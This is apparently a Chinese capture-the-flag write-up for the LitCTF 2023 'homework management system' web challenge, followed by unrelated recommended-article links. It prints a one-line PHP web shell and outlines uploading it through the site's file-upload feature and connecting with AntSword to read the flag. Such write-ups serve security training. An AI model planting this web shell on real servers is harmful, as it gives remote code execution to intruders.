[LitCTF 2023]作业管理系统

知识点补充

1.一句话木马上传

html 复制代码
<?php @eval($_POST[1]); ?>

2.file协议

作用: 用于访问你自己电脑上的文件。

格式: 它的网址开头是 file:///(注意是三个斜杠)。

本质:不是网络协议,不经过互联网。它只是告诉浏览器:"嘿,别去网上找,直接从我本地硬盘打开这个文件。"

解题思路一(文件上传)

1.web题首先f12查看,看看有没有彩蛋(提示)

复制代码

2.使用文件上传上传带有一句话木马的文件

3.上传成功后使用蚁剑进行连接(注:这里是对/1.php进行连接,因为题目上面有提示直接上传到了网页的跟目录)

4.直接对根目录进行查找,找到flag

解题思路二(远程连接)

1.使用远程下载

2.点击编辑文件

3.得到flag

相关推荐
云飞云共享云桌面4 小时前
传统工作站 vs 云飞云共享云桌面:制造业设计云桌面选型深度对比
运维·服务器·前端·网络·3d·架构·制造
UXbot4 小时前
如何选择适合公司项目的UI设计工具?企业选型指南
前端·低代码·ui·团队开发·原型模式·设计规范·web app
llz_1124 小时前
web-第四次课后作业
前端·spring boot·web
武清伯MVP5 小时前
前端跨域方案大合集
前端·javascript
小刘|5 小时前
Spring AI Alibaba 集成和风天气 API 实战
java·服务器·前端
星星在线6 小时前
我是怎么把页面图片流量砍掉一半的
前端·javascript
森G6 小时前
61、信号与槽机制在 TCP 编程中的应用---------网络编程
网络·c++·qt·网络协议·tcp/ip
zyplayer-doc6 小时前
企业知识库安全与权限管理完全指南:从加密到审计的六层防护
人工智能·安全·pdf·编辑器·创业创新
木叶子---7 小时前
前端打包出错
前端·人工智能·tensorflow
JAVA面经实录9177 小时前
前端系统化学习计划表(含完整知识思维导图)
前端·学习